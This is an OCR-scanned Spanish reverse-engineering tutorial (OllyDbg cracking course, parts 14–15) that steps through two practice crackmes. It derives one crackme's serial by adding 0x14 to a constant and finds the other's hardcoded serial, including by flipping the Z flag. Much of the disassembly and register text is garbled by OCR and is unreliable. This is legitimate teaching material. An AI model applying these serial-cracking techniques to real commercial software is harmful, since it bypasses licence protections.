MOU DWORD PTR SS: [EBP-30],EDX 
MOU EDX, DWORD PTR DS: [EAX+4] 
MOU DWORD PTR SS: CEBP-20],EDX 
MOU EAX, ia PTR_ DS: [EAX+8] 
MOU DWORD PTR SS: [EBP-28],EAX 
LEA EAR, DWORD PTR SS: CEBP-24] 
ADD ESP,-4 

PUSH 8 


mint ra 


cos oSo 
RO 


FL, 


Mueve a EDX los siguientes cuatro bytes del número constante 


AI ARAS Ad21 AA ER AO alidt-llé 


La aclaración del OLLY lo muestra, en este caso [eax+4] es en este caso el contenido de 401226 y al 
ejecutar con F7 mueve los 4 bytes siguientes a EDX. 


EDX, DWORD PTR DS: [EAX+4] 
U DWORD PTR SS: CEBP-2C],EDX 
EAX, DWORD PTR DS: [EAX+8] 

Y DWORD. PTR SS: [EBP-28],EAX 


00|e...W... 
Quedando el número completo copiado allí. 


Allí vemos que un poco mas abajo se acerca a una llamada a la api memset, allí vemos los parámetros en 
OLLYDBG 


3304 FC ADD ESP,-4 
sA us SH 8 


; PU n=8 

- 6400 PUSH 8 c = BB 

58 PUSH _EAX 5 

- ES FOB20000 memset 

. 8304 10 ADD ESP, 10 A 


Tiene tres valores (n, c y s) 


ses la dirección de inicio 
n que es la cantidad de bytes que van a llenar 


c es el valor con el cual se va a llenar esa zona 


En el stack se ven mejor en este caso los parámetros, o sea que llenara con ceros (c ), 8 bytes (n) a partir 
de s (240f9f0). 


Al ejecutar la api con F8, allí vemos que lleno de ceros, los 8 bytes a partir de 240f9f0 que es la dirección 
de inicio s. 


Mas abajo vemos una llamada a Istrlen, que es una api que calcula el largo de una string lleguemos hasta 
el call a la misma. 


8045 DA LEA EAX, DWORD PTR SS: CEBP-36] 
50 PUSH EAX 

Es DCóO20000 

8ac4 16 [ADD ESP»18, 


mara 


Guo 


... > 


0F3ES 
Ea] 


DARA 


O sea nos dará el largo de la string que comienza en 240f9E4, que es el numero constante famoso jeje. 


Al pasar con F8 el call a dicha api en EAX nos devuelve el largo de la string 


ASCII "10445678951" 


EDX 7F3034383 
EBX 000000Ba 
ESP B249F99C 
EBP B240FA14 
ESI 00401240 crakmeea. 00401240 
EDI B249FA7C 


FTP ArdA12d” rrabmoca ARAÍAI dr 


g MOU EAX, EAxX 
9 FF LEA EDX, DWORD PTR DS: CEAX-1] 


> FO CMP_ DWORD PTR pea OnagióS 


nm 


dm 
ala ted 


Ex 


Allí le resta uno a EAX o sea OB-1 y como es LEA mueve ese valor directo a EDX o sea que EDX vale 
DA. 


En la siguiente línea compara EDX que vale OA con el contenido de [EBX-10] que es cero. 


II AAN AA 


LEA EDX, DWORD PTR DS: [EAX-1] 


CMP_DWORD PTR een Dadniaad 


NOP 

LEA ESI,DWORD PTR DS: [ESIJ 
MOU EAX, DWORD PTR SS: [EBP-C] 
MOV EDX, DWORD PTR SS: [EBP-10] 


a 


Pues como cero es mas bajo que OA en la comparación, salta y va a 40135C. 


3D7426 80 LEA ESI, DWORD 55 DS: [ESI] 
> 98B45 F4 MOU EAX, DWORD PTR SS: LEBP-C] 
+. 8B55 FM MOU EDxX, DWORD PTR SS: [EBP-107 
4106 ADD EAX, EDX 


En la próxima línea mueve a EAX el puntero a nuestro serial falso, allí vemos que luego de ejecutar con 
F7, EAX apunta a nuestro serial falso 98989898 


O240F9E4 
0000000 
000009000 
D240F9AC 
0240FA14 
00401240 crakmeea. 00401240 
0240FA7?C 


EIP 00401363 crakmeea. 00401363 


C 1 ES 0023 32bit O(FFFFFFFF) 
P1 CS 0018 32bit O(FFFFFFFF) 


Vo 


LEM ESi¿UWURA Fin DUI; LEDILJ 


> 28B45 F4 MOU EAX, DWORD PTR SS: LEBP-C] 
+ 8B55 FB MOU EDX, DWORD PTR SS: CEBP-107 
. B10D0 ADD_EAX, EDX 

ACDC1A MANO Y CAY ODUTE DTD MO.TEnvi 


EBX 

ESP B2440F9AC 

EBP 0240FA14 

ESI 00401240 crakmee 
EDI M2440FA?7C 


EIP 00401366 crakmees 


— 4 P 1 EC 111402 27hi+ Ñ 


.«_ 8B55 FO MOU EDX, DWORD PTR SS: [EBP-10] 
. 100 ADD_EAX, EDx 

. BFBE1O MOUSX EDX,BYTE PTR DS: CEAX] 

. RANd42 Fr. FA FAX. MIARA PTR MS: FFNX-141 


Como EAX apunta al inicio de nuestro serial falso, le suma en este caso EDX que vale cero posiblemente 
para hacer un LOOP que se ira actualizando incrementando EDX a 1, 2 etc y recorrer de esa forma todos 
los bytes de nuestro serial falso uno a uno en dicho LOOP. 


pO4B1363| . 8BS5 FO MOU EDX, DWORD PTR SS: [EBP-10] 
14B . 6100 ADD_EAX, EDX 

DFBE1O X EDX,BYTE_PTR_DS: EAX] 
3D42 EC LEA EAX, DWORD PTR DS: LEDX-14] 
3D55 DO LEA EDX,OWORD PTR SS: CEBP-30] 
3840 FO MOU_ECX, DWORD_PTR_S5: CEBP-10] 
OFBE1411 MOUS2 _EDX,BYTE PTR DS: [ECX+EDXxJ 
tl CMP_EAX, EDX 
3D45 Da LEA EAX, DWORD PTR SS: [EBP-30] 
8B55 FO MOU EDX, DWORD _PTR_SS: CEBP-10] 
Cón4a2 73 MOU BYTE PTR DS: TEDX+EAX],73 
FF45 CC INC DWORD PTR SS: CEBP-34] 
ES INC DWORD PTR SS: CEBP-10] 
39F6 MOU ESI,ESI 
Bs 2E124000 |MOU EAX,crakmeea. 0040122E 
3B10 MOU EDX, DWORD PTR DS: [EAXJ 
8955 BO MOU DWORD PTR SS: [EBP-50],EDX 
3B50 04 MOU EDX, DWORD PTR DS: [EAX+4] 


DS: [B0044BES3 
EDX=00000000 


Como ya sabemos que MOVSX en el caso de números positivos mueve el byte a EDX y si es positivo 
llenara el resto con ceros, y si es negativo con efes jeje. 


En este caso no hay problema mueve el primer byte de mi serial falso el 39 a EDX al ejecutar la línea 
vemos que EDX vale 39. 


A |Registers (FPU) 

——|EAX B0B44BBS ASCII " 
ECX SCII " 

EDX 

EBX 

ESP B2490F9AC 

EBP 0240FA14 


ESI 60401240 crakmes 
EDI 02448FA?C 


EIP 6040136B crakmee 


C O ES 0023 32bit 
CS GU1B 32bit 
9023 32bit 
DS 0923 32bit 
FS 0938 S2bit 


| Il 
IMD 
¡100 o 

0] 
un 
AA 


. B1DO ADD_EAX, EDX 

. BFBEÍO MOUSx EDX, BYTE _PTR_DS: [EAXJ 

. 8D42 EC LEA EAX, DWORD PTR DS: [EDX-14] 

+ 8055 DO LEA EDx, DWORD PTR SS: [EBP-30] 

.« 3B4D FO MOV ECX, DWORD _PTR_SS: [EBP-10] 

. BFBE1411 MOUSX EDX, BYTE PTR DS: [ECX+EDX] 
. 39D0 CMP_EAX, EDX 


Y como EDX vale 39, le resta 14 y como es un LEA mueve el resultado directo a EAX. 


A |Registers (FPU) 


| ll 


O sea que la operación que realizo es tomar 39 que es el valor hexa del primer carácter de mi serial, y le 
resto 14 y quedo por ahora en 25, el cual esta en EAX. 


. OFBELO MOUSX_EDX, BYTE _PTR DS: [EAX] 

.  8D42 Ec LEA EAX, DWORD PTR DS: LEDX-14] 

- 8D55 DA LER EDX+DUORD PTR SS: [EBP-503 

- 8840 FO MOU_ECX, DWORD_PTR_SS: CEBP-10] 

- OFBE1G411 foUSZ EDR+ETE PTR DSi LECR+EDX] 
- 3908_ CMP_EAX, EDX 


La siguiente línea mueve el valor EBP-30 que en mi maquina es 240f9FE4 que apunta al inicio del numero 
constante guardado a EDX. 


. MOU EDX, DWORD PTR DS: CEAR+4: 
Sd drEsi=O240rOEA, [ASCII "104456/8951") 


e 1551515151555) 


Al apretar F7 


ESP B24BF9AC 
EBP M24BFA14 
ESI 600401240 crakmeea. 00401240 
EDI B24BFA?C 


EIP OO0Lari ocrakmeea. 00401371 


| MN 


DO 
j 
nm 
+ 
—. 
—. 
— 
_. 
—. 
— 
-. 


O(FFFFFFFF) 
O(FFFFEFFF) 
OLFFFFFFFF) 
PFEENFARA! FEF 


DI 


3D55 DÓ LEA EDX, DWORD PTR SS: [EBP-30] 
, 8B4D FO MOU_ECX, DWORD _PTR_SS: LEBP-19] 
6045 - OFBE1411 MOUSE EDX, BYTE PTR DS: [ECX+EDX] 


3900 


- 39D8 CMP_EAX, EDXx 
«v 75 6D JNZ SHORT crakmeea. 00481389 


Aquí vemos que mueve a ECX el valor cero y en cada pasada que haga en el LOOP se incrementará, 
permitiendo a ECX+EDX apuntar a los distintos bytes del numero constante. 


gub> LY 2 EUX, UWURU PIK 95: E 
. 8B4D FO U ECX,DWORD_PTR_SS: [EBP-10 
. OFBE1411 HOUSE EDX,BYTE PTR Do: LECH+EDXI 


. 3900 CMP- EAX,EDX 
«v 75 8D JNZ SHORT crakmeea. 00401389 


Ahí vemos como ECX por ahora vale cero y EDX apunta al inicio del numero, moverá a EDX en este 
primer paso por esta línea, el primer byte del numero vemos en la aclaración del OLLYDBG. 


OY 4 
Stack DS:LO240FOE4I=31 11") 
EDX=0240F9E4, (ASCII ”10445678951”) 


MIO EDS» LDIWURD 


op“ ru MOV EL IWS Ti 225 LED 10J 


OFBE1411 MOUSX EDX, BYTE PTR DS: [ECX+EDX1 
. ON E El 
w 75 BD 
8D45 DA LEA EAX, DWORD PTR SS: [EBP-30] 
ODCE Ef MA ENY MNR DTD Sc. TEDD-1141 


EDx=00000031 
EAX=00000025 


En EAX esta el valor del primer byte de mi serial falso 39 al cual le resto 14, quedando en EAX el valor 
25, y en EDX el primer byte del numero constante o sea 31 

Por lo tanto vemos que 

CMP EAX,EDX 

En realidad es 

CMP (PRIMER BYTE DE MI SERIAL FALSO - 14), PRIMER BYTE DEL NUMERO CONSTANTE 
CMP 25,31 


Y al ser la diferencia entre ambos miembros diferente de cero, no se activa el FLAG Z y salta el JNZ. 


Como estoy utilizando el serial falso, la comparación no es igual, solo serán iguales ambos miembros 
cuando usemos el serial correcto ya que es el valor que hace que la comparación llegue a ser una 
igualdad. 

CMP (PRIMER BYTE DE MI SERIAL CORRECTO - 14), 31 

Ya que la condición es que ambos miembros sean iguales 

PRIMER BYTE DEL SERIAL CORRECTO-14= PRIMER BYTE DEL NUMERO CONSTANTE 


Por lo tanto 


PRIMER BYTE DEL SERIAL CORRECTO= PRIMER BYTE DEL NUMERO CONSTANTE +14 


1VEIHUFHHL]F4 FH 4 2 UN 3 Ue £ 341: LS rEw 


Commanc 23114 y] HEX: 45 - DEC: 69 - ASCII: 


PRIMER BYTE DEL SERIAL CORRECTO = 31 + 14 

PRIMER BYTE DEL SERIAL CORRECTO =45 que corresponde a E en ASCII. 

O sea que la primera letra del serial es E. 

Esta afirmación si repetimos el loop vemos que se cumple byte a byte 

PRIMER BYTE DEL SERIAL CORRECTO= PRIMER BYTE DEL NUMERO CONSTANTE +14 
SEGUNDO BYTE DEL SERIAL CORRECTO= SEGUNDO BYTE DEL NUMERO CONSTANTE +14 
TERCER BYTE DEL SERIAL CORRECTO= TERCER BYTE DEL NUMERO CONSTANTE +14 

Y así sucesivamente 


Siguiendo la misma lógica, a cada byte del numero constante, le sumamos 14 y obtenemos el valor del 
byte correspondiente a nuestro serial correcto. 


31 30 34 34 35 36 37 38 10445678 
39 35 31 00 00 00 00 00 951..... 


31 +14=45 es la letra E en ASCIH 


30 + 14= 44 es la letra D en ASCII 


34 + 14= 48 es la letra H en ASCII 


34 + 14= 48 es la letra H en ASCII 


35 + 14= 49 es la letra | en ASCII 


36 + 14=4A es la letra J en ASCIH 


37 + 14= 4B es la letra K en ASCII 


38 + 14 = 4C es la letra L en ASCII 


39 + 14= 4D es la letra M en ASCII 


35 + 14= 48 es la letra 1 en ASCII 
31 +14=45 es la letra E en ASCII 
Por lo cual el serial correcto es 
EDHHIJKLMIE 


Pongámoslo en la ventana del serial borrando todos los BPX. 


CrackMe 


[EDHHIJKLMIE] 


Apretemos Check 


Correct! 


Correct! 


Les dejo como tarea recorrer el loop completo, ver como va actualizando los contadores y como va 
incrementando los bytes del numero constante y del serial falso, y como llega al cartel de correct o de 
incorrect. 


No es tan easy el crackme jeje ya que recién están empezando, pero creo que si lo practican pueden 
sacarle buen jugo. 


Bueno aquí tienen la tarea sencilla para la parte 15 es otro crackme llamado SPLISH, solo tienen que 
hallar en la parte de HARDCODED el serial correcto y con el serial abrirán la parte 15 jeje sigo 
malísimo, pero les digo que este crackme no se parece en nada a este anterior que hice, es bien sencillo, 
ya iremos practicando mas difíciles de a poco. 


Ricardo Narvaja 
05 de diciembre de 2005 


INTRODUCCIÓN AL CRACKING CON OLLYDBG PARTE 15 


Bueno antes de seguir con el ultimo hardcoded, mostraremos la solución del que quedo pendiente como 
tarea, el SPLISH que es bien sencillo. 


Abrámoslo en OLLYDBG. 


— File View Debug Plugins Options Window Help 


AMB vie] $0) ul + Ljejmt[wnH]c]/]K/B]R]».] 5] 


17] pModu le = NULL 
ÉS 3070000 CALL _<JMP.¿KERNEL32. GetModu leHand leA> GetModu leHandleA 
AZ 80344000 |MOU DWORD PTR DS: [4023480], EAX 
ES 73070000 |CALL <JMP2KERNELS2.GetCommandLineAs — [CGetCommandL inef 
6A DA USH BA 4 = OBBOBODBA 
FF25 84344001 PUSH DIORD PTR DS: [403484] lJ21:12]:1:]5]:] 
6 lJ2125]21:]5]%] 
FF25 80344001 PUSH DWORD PTR DS: [403480] 1 = 0BBBBBOA 
ES B6000000 | CALL Splish.B040102C Splish. 00401020 
PUSH EAX Ex itCode 


50 
Es 52070000 Ex itProcess 
== PLUICH FRP 


A 


Allí arranco en OLLYDBG y se detuvo en el ENTRY POINT. 


Si vemos las apis que utiliza con click derecho SEARCH FOR-NAME (LABEL) IN CURRENT 
MODULE 


1,15€ 
1,008 
findes 7 SM_CXSCREE 
ETS Name in all modules 
Fail Backup » 
1, Copy »' Command 
en Binary >| Sequence of commands 
31. Assemble Space Constant 
JE Label , Binary string y e 
+3 pd q All intermodular calls ec 
is  Breakpoint » PFP 
E Ñ All cornmands 
1, Hit trace » 
a ces > All sequences 
a o All constants 
Goto > Allswitches 
EP! Follow in Dump »| All referenced text strings 
1,€ : 
¿EF + 
Ef View call tree CtrHK Us idea bal 

ma User-defined comment 

Find references to » 


7CSTEDAF]|RETUAN to kemel3z. ¿CS16D4F 


Mier » 


Vemos la lista de apis que utiliza 


ta] ed x] CITE ETE 


Address | Section Comment 
B0402070| .rdata IE .«BeginPaint 
100402004 | .rdata Import CreatePatternBrush 
B0402068| .rdata | Import . Create indowExA 
B0402068| .rdata Import .DefWindowProcA 
B0402064| .rdata Import «DispatchMessageA 
BO4B203C| .rdata Import «EndPaint 

B0402618| .rdata Import «ExitProcess 
BO4B205C| .rdata Import «GetClientReot 
B0402014| .rdata Import .GetCommandL ineA 
B0402058| .rdata Import .GetMessageA 
B0402610| .rdata Import «GetModu leHandleA 
B0402034| .rdata | Import etSystemMetrios 
B04B200C| .rdata Import GetTickCount 
B0402024| .rdata Import 

60402020| .rdata Import «LoadBitmap 
B0402038| .rdata Import «LoadCursorA 


BO402028| .rdata | Import 
BO40202C|.rdata | Import 
B0402030| .rdata | Import 
B0401000| .tent Export 
1B04B0206C| .rdata Import 
B0402074| .rdata | Import 
B0402040| .rdata Import 
B0402000| .rdata | Import 


«LoadIconA 


.PostQu itMessage 
«RegisterClassExA 
. SendMessageA 
SetBkMode 


B0402044| .rdata Import .SetFocus 
B0402048| .rdata Import . SetMenu 

B04B204C| .rdata Import . Showbl indow 
B0402050| .rdata | Import «Trans lateMessage 
B0402054| .rdata Import . Updatellindow 


Vemos que utiliza las apis GetWindowTextA para ingresar el serial y MessageBoxA, para mostrar el 
cartel de si acertamos o no, podríamos aquí poner un BPX en ambas apis, pero veamos que nos muestra la 
lista de STRINGS que usa el programa. 


34731, 008 es pririzó OIC O A 
EEES Name in all modules 

ESE Backup » Pa 

2] Copy »' Command CtrHF 000892 

341 

e Binary »' | Sequence of commands Ctrs a 

28. Assemble Space Constant e 

za: Label : Binary string CtrB ._ty 

E Pty 
Comment ; , Pty 

>: Ñ á All intermodular calls oo 

o "1 alicommands y e27F 

> Hittrace » 

3) E A All sequences 

1] un trace 

5]. All constants 

ZÉ Goto > All switches 

ap Follow in Dump » 

E View call tree Ctri+K 


User-defined label 
User-defined cornment 


Find references to » 


Hago en el listado click derecho SEARCH FOR-ALL REFERENCED TEXT STRING 


Address |Disassemb ly Text string 
20491908] PUSH 4 (Initial CPU selection) 
10401085 03H DWORD PTR ye pa Splish.00403091 ASCII O 
90401106| PUSH Splish. 894031 A 
po4B1110 PUSH Splish. Se4aso0o 
00401181|PUSH Splish. 00403086 
B0401186| PUSH Splish. 00403069 
B04011DC| PUSH Spl ish. 00403092 
604011E1| PUSH Splish. 00403069 
90401207 | PUSH Splish. AESUÉO 
04981200 
pa4B1237 
p040126A ish. 
9040129D| PUSH spl ish: 0040305B 
90401209 | PUSH Splish. 00403020 
4012DE|PUSH Splish.00403019 
0040130F ES Splish.00403030 
60401314|PUSH Splish. ete 
10401353 AScI 1 Phardtoded”, 
BB4B138E a I "Congratulations,” 
D04B139E| ASCII ” you got the har” 
DO4013AE|ASCII "d coded serial”, 0 ' 
B04013EF | PUSH sl ish: + 0040300A Ls ul 
plish. 
604013D4| PUSH Splish.0040300A 


96491309| PUSH Spl ish. 10493067 I "Sorry, please try again.” 

B0401433| PUSH Spl ish. 00403004 I "Splish, Splash” 

90491438| PUSH Spl ish. 00493009 1 "Your mission is to disable the Splash Screen, find the hardcode 
B040147F[|ASCII "Splash_Class”, a 

B048148C| PUSH_Spl ish. 00403088 ASCII "MyBmp” 

004014DD Pp DWORD PTR SS: [EBP-81,Splish.0040147| ASCII "Splash_Class” 

B0401528| PUSH Splish.0040309A ASCII "Splish, Splash” 

p040152D PUSH Splish.0040147F ASCII "Splash_Class” 


60401680| PUSH Splish. 60403004 
90401685| PUSH Spl ish. 00493040 
60401695| PUSH Splish.B0403090A 
B040169A| PUSH Splish. 00403053 
BO4B16CF|PUSH Splish. 004030909 


Cc en Eslt Splash” 
I "Please enter your name.” 
plish, Splash” 
lease enter your serial number.” 
EE Splash” 


B04016D4| PUSH Splish. 00403042 ¡00d Job, now keygen it.” 
B04016E4| PUSH Splish. 004030909 BSCH molle Splash” 
B04016E9| PUSH Splish. 00403067 ASCII "Sorry, please try again. 


Allí vemos el texto del cartel de Congratulaciones, que nos muestra cuando colocamos el serial correcto, 
por lo tanto hagamos doble click allí, a ver donde usa ese texto, así estaremos en la zona caliente o cerca. 


Allí vemos la zona donde trabaja con el serial que introducimos 


co un 
38 él 72 64 lAscIT MHardtoded”, 8 
6A 20 PUSH 20 

68 15324008 |PUSH Spl ish.00403215 

FF35 90344001 PUSH DWORD PTR DS: [403490] 
ES BBO30000 
2D05 53134001 LEA EAX, DWORD PTR DS: [4013531 
Fania a EN DAD PTR DS: [403215] 


20 (32.) 
Splish. 00403215 


38 PTR DS: LEAX 
74 80 

2a08 MOU CL,BYTE PTR DS: [EAX] 
3a13 MOU DL,EYTE PTR DS: [EBX] 
38b1 CMP- CL,DL 

75 4A JE SHBRT SoLisn.onso1202 
48 NC EAX 

43 INC EBX 

EB EF 

EB 


2F 
43 6F 6E 67 ¡ASCII "Congratulations,” 
20 79 6F 75 ¡ASCII ” you got the har” 
64 20 63 6F (ASCII "d coded serial”,0 
[1] PUSH a MB_0K'MB_APPLMODAL 


63 BAS304000 [PUSH Splish.0040300A ish lash" 

Es glosa PUSH goLish:ooaoiase vCgAgpatiLabións, you got the hard coded serial” 
SA Ba PUSH a Owne 

Es 78030009 

EB 13 


6A 00 PUSH O Sty MB_OK1MB_APPLMODAL. 
68 04304098 [PUSH Splish. 09493909 
68 cOn Buen al 10403067 


6A 00 PUSH 
ES 63030009 FALL <unP.2USERS2.MessageBona> hez2sseñouñ 
6l POPAD 
v EB 73 ¿UB SHORT SpLish. 09401458 
66:83F8 62 |CMP AX 
75 18 JNZ SHORT Solish.00401409 


Vemos la entrada de texto con la api GetWindowTextA y los MessageBoxA con sus respectivos textos de 
si acertamos 0 no. 


Pues pongamos un BPX alli, en el call a la api GetWindowTextA para comenzar desde donde 


introduce el serial que tipeamos. 


EE 9 JMP SHORT Splish. 00491350 
48 61 72 64 ¡ASCII "HardCoded”, 8 
6A 20 


68 15324000 [PUSH Splish.00403215 
FF35 90344901 PUSH DWORD PTR DS: [403490] 
Es BB030008_ CALL <UMP. £USER32. GetllindowTextA> 
2005 S3134001 LEA EAX,DWORD PTR DS: [4013531 
8D10 15324001 LEA EBX,DWORD PTR DS: [493215] 

CMP BYTE PTR DS: [EAXJ,0 


74 6c JE SHORT Splish. 00481380 
3A08 MOU CL,BYTE PTR DS: [EAX] 
8A13 MOU DL,BYTE PTR DS: [EBX] 


43 INC EBX 


2F 
43 6F SE 67 ¡ASCII "Congratulations,” 
20 79 6F 75 ¿ASCII ” you got the har” 
64 20 63 6F (ASCII "d coded serial”, 0 
1512] PUSH a 
68 BA304000 |PUSH Splish. 004030909 
68 8E134000 US EIC 


1517] 
ES 78030000 
EB 13 
112] El 
68 BA304000 [PUSH Splish. 00403009 
683 67304000 pH] Ed 


117] 
ES 63030099 
ES POPAD 


Corro el crackme con F9 o RUN 


23 Splish, Splash 
E; a Hen E A e 


NamefSerial Check 


Count = 29 (32.) 
fer = Splish. 00403215 
hbinc NULL 


GetllindouTextA 


= MB_OK¡MB_APPLMODAL 
"Splish, Splash” 
"Congratulations, you got the hard coded serial” 
Owner = NULL 
MessageBoxA 


[E = MB_OKiMB_APPLMODAL 


Tit Splish, Splash” 
Text = "Sorry, please try again.” 
hOwner = NULL 

MessageBoxA 


se 


Como solo pedimos por ahora solucionar la parte de HARDCODED, tipearemos un serial falso, allí en la 
parte superior y apretamos el botón CHECK HARDCODED. 


Splish, Splash 
File Help 
| Hard Coded: [98989898] 


Check Hardcoded 


Name: 


Serial: 


Namef/Serial Check 


Para en el BPX que habíamos colocado 


48 61 72 64 ¿ASCII "HardCoded”,a 
6A 20 PUSH 20 
68 15324000 [PUSH Splish.D0483215 


Ps... . . us. 


0ADO aa 


Ea 


FF3S 963440901 PUSH DWORD PTR DS: [403490] 
ES BB430BOO 


8005 53134001 LEA EAX, DWORD PTR DS: [401353] 
3D1D 15324001 LEA EBxX,DWORD PTR DS: [403215] 


eocmMD DUTE DTD Ms FrEenvi 


hlnd = 0BBBBESA [class="Edit” parent=00150674) 


Count = 20 (32.) 
[ss = Splish.00403215 
GetllindowTextA 


Allí vemos tanto en el stack como en las ayudas que nos muestra el OLLY que el BUFFER donde 
guardara el serial que tipeamos, esta en 403215. 


it” parent=06150674) 


ARAA1172l Sn 1 ish. aña 


Así que vayamos al dump a ver el buffer. 


Go to expression 


mina Appearance 


UA 
Count = 28 (32.) 


Lee hEnn 


'DODO 


Como al ejecutar con F8, ejecuta todo el call con la api incluida, pues ya tenemos el serial falso guardado 
en el BUFFER. 


el 


24001 LEA EBx,DWORD PTR DS: [403215] 
Ne BYTE PTR DS:[EAXJ,9 


MOU CL,BYTE PTR DS: [EAX] 
MAL Ni RYTE PTR NS-TERY1 


Bueno la próxima línea moverá 401353 a EAX, (recordar que los LEA no mueven el contenido de la 
dirección de memoria, si no solo el resultado de lo que hay entre corchetes, en este caso moverá 401353) 
Veamos en el DUMP dicha dirección, en la línea hacemos click derecho FOLLOW IN DUMP- 
MEMORY ADDRESS lo que nos muestra en el DUMP la dirección de memoria 401353. 


| pen 
| Go to » ru again.” 


Follow in Dump 
Wiew call tree 


Search for 


Al ejecutar queda EAX con el valor 401353 y al lado nos aparece la aclaración de que dicha dirección 
apunta a una string en este caso “HARDCODED” 


Ba4B1178 


Splish. 


Splish.00401375 


bit BLFFFFFFFF) 
bit BLFFFFFFFF) 
bit DUFFFFFFFF) 
bit DLFFFFFFFF) 
PFFDFOGB(FFF) 


[Em 


Prec NEAR 


Ls 


] Of LEA ERAx, DWORD PTR DS: [401353] 
NOS a EBX, DWORD PTR PS 
CMP_ BYTE PTR DS: [EAXJ,0 


PI 


PP 

1 

I 

P 0B4B1378 Splish.B040137B 

a ES it O(FFFFFFFF) 
1 (FFFFFFFE) 
B A(FFFFFFFF) 
Ll ACFFFFFFFF) 


Y OLLYDBG nos muestra a la derecha, que esa dirección apunta a la string “98989898”, que es mi serial 
falso y que se ve en el dump si hago como en la instrucción anterior. 


ia e 
Follow in Dump Selection 
View call tree CtriK Memory addr 


Sasrrh far 


Allí esta 403215 apunta a nuestro serial falso 


5/39 38 39 38 39 3 
00 04 00 00 00 
e 


MOU CL,BYTE PTR DS: [EAX] 


MOI OM MATO ATA MPAA 


La siguiente linea compara si el primer BYTE del contenido de EAX es cero, como EAX vale 401353 


Registers (FPU) 

-JERX BB401353 ASCII "HardCloded” 
ECX 77D03219D USER32.77D3219D 
EDX B0140608 
EBX 40403215 ASCII "938989898" 
ESP BO12FC64 
EBP BO12FC34 
ESI 604611738 Splish.00401178 
EDI BB12FCEC 


EIP 06401378 Splish.0040137B 


DS: [664613 = 
Jump from 66461 


Address [Helimp_ | 


00401353148 61 72 64 43 6F 64 65) HardCode 
añdA1S5R1Ad AR AA 24 AR 15 22 44id.1 hx2m 


Allí esta el primer Byte es 48, en la aclaración OLLYDBG también nos dice que esta leyendo el 48 que 
corresponde a la H en ASCII de la primera letra de la palabra HARDCODED, ve si es cero, como no es 
cero continuara. 


LA IIA 


Em 


HNMNDDO 


OO 


Como la comparación no activo el FLAG Z al no ser ambos miembros iguales, pues el JE siguiente no 
saltara, recordar que JE solo salta al estar activado el FLAG Z. 


Pues continuamos con F7 


£  29u00 ue LIM ODYTIE TIN UDRLEMOJA 


sa4o1=7E | 7? 
MOV CL,BYTE PTR DS:LEAX] 


MOU DL,BYTE PTR DS: [EBx] 
MP CL,DL 


38D1 c 
S 4 
INC EAX 
INC EBX 
EF 
2F 


6F 6E 67 ¡ASCII "Congratulations,” 
ASCII ” you got the har” 


20 63 6F (ASCII "d coded serial”, 0 

1512] PUSH B Style = MB_OKiMB_APPLMODAL 

6A304000 [PUSH Splish. 00403094 Title = "Splish, Splash” 

8E134000 |PUSH Splish.0040138E Text = "Congratulations, you got the hard coded serial” 
A Ba PUSH 8 hOwner = NULL 
A Da PUSH B St, MB_0K;MB_APPLMODAL 

6A304000 |PUSH Splish. 0040309 "Splish, Splash” 

67304008 |PUSH Splish.00403067 Tex "Sorry, please try again.” 
A 6n PUSH O hOwner = NULL 

63030000 MessageBoxA 


CALL _<JMP.2USER32. MessageBoxA> 
POPAD 


Aquí vemos con una visión mas ampliada, que ahora moverá el primer byte de [EAX] que es el 48 que 
corresponde a la palabra HARDCODED y en la siguiente línea moverá [EBX] que corresponde al primer 


byte de mi serial falso y los comparara si no son iguales salta a 4013D2 que es el cartel de SORRY, 
PLEASE TRY AGAIN. 


Verifiquemos que esto es asi 


Apreto F7 y mueve a CL el valor 48 


isters (FPU) 

JEAX BO461 ASCII "Har 
ECX 77032 USER32. 77D 
EDX 56140608 
EBX B0403215 ASCII "989 

BB12FC64 


EBP BB12FC34 
ESI 06401173 Splish. 004 
EDI 6B12FCEC 


EIP 60401332 sa ll 
b 


ES 0623 32b1t BLFF 
P1 CS 0B1B S2bit O(FF 
AO SS 6623 32bit O(FF 
Zz 6 DS 0023 32bit B(FF 
SA FS ARSRA 22hit ?FFM 


pa 
o 
o 


CL como recordamos es el registro que corresponde a los dos ultimas cifras de ECX, alli movio el 48, lo 
vemos en la imagen resaltado. 


MOU CL,BYTE PTR DS: CEA 
MOU DL,BYTE PTR DS: [EBX] 
CMP CL, DL 


PU mm 


isters (FPU) 
—|EAX 00401353 AS 
ECxX 77D32148 US 
EDX 00140639 
EBX 00403215 AS 
ESP 0612FC64 
EBP 0012FC384 
ESI 60461173 Sp 
EDI 6B12FCEC 


EIP 66401384 Sp 


CO ES 0623 32 
P 1 CS 8818 s2 


Em 


SAS MOU CL,BYTE PTR DS: LEA 
3nA13 MOU DL,BYTE PTR DS: [EB 
- 38D1 
.v 75 4A 
44 TNT. FAX 


La aclaración del OLLYDBG no deja dudas, compara el 39 que es el 9 de la primera cifra de mi serial 
falso con H que es la primera cifra de HARDCODED. 


MOU CL,BYTE PTR DS: CEAX] 
MOU DL,BYTE PTR DS: [EBXJ 
CmP CL, DL 


INC EAX 
INC EBX 


ASCII "Congratulations,” 
ASCII ” you got the har” 
ASCII ”d coded serial”,0 


PUSH Style = MB_OK:MB_APPLMODAL 
PUSH Splish. 00403004 Title = "Splish, Splash” 
PUSH Splish.0040133E Text = "Congratulations, you got th 
PUSH a hOwner = NULL 
MessageBoxA 


Vemos que al no ser iguales salta al cartel de error, si fueran iguales y no saltara lo cual podemos hacer 
fácil cambiando el FLAG Z con doble click. 


Ahora Z vale 1 como si en la comparación ambos bytes fueron iguales y la resta entre ambos dio cero y 
activo el FLAG Z o cero. 


.v 75 4A 
40 INC EAXx 


INC EBX h 


Vemos que en este caso INCREMENTA EAX y EBX y salta con un JMP al inicio del LOOP 


6b64A1 
an4B1 


43 
."” EB EF 


Bu4B1375/|.. SD1D 15324001 LEA EBx, DWORD PTR DS: [403215] 
BB4B137 > pa033 BB CMP BYTE PTR DS: [EAXJ1,0 
64501 .v| 74 BC 
00401 . | 38A083 MOU CL,BYTE PTR DS: [EAX] 
00451 . |8A13 MOU DL,BYTE PTR DS: [EBX] 
00401 . | 38D1 CMP CL, OL 
z .v| 75 4A 

. 140 INC EAX 

. 143 INC EBX 

IANERTER 
B645138C|] > EB 2F 


Ahora EAX apunta al segundo byte de HARDCODED y vemos que el loop se repetirá comparando byte a 
byte, hasta que sea cero el contenido de EAX o sea cuanto se terminen los bytes de la palabra 
HARDCODED ya que en una string, luego de su ultimo carácter, hay un cero. 


Pues entonces al incrementar EAX y EBX ira leyendo y comparando los segundos bytes, si son iguales, 
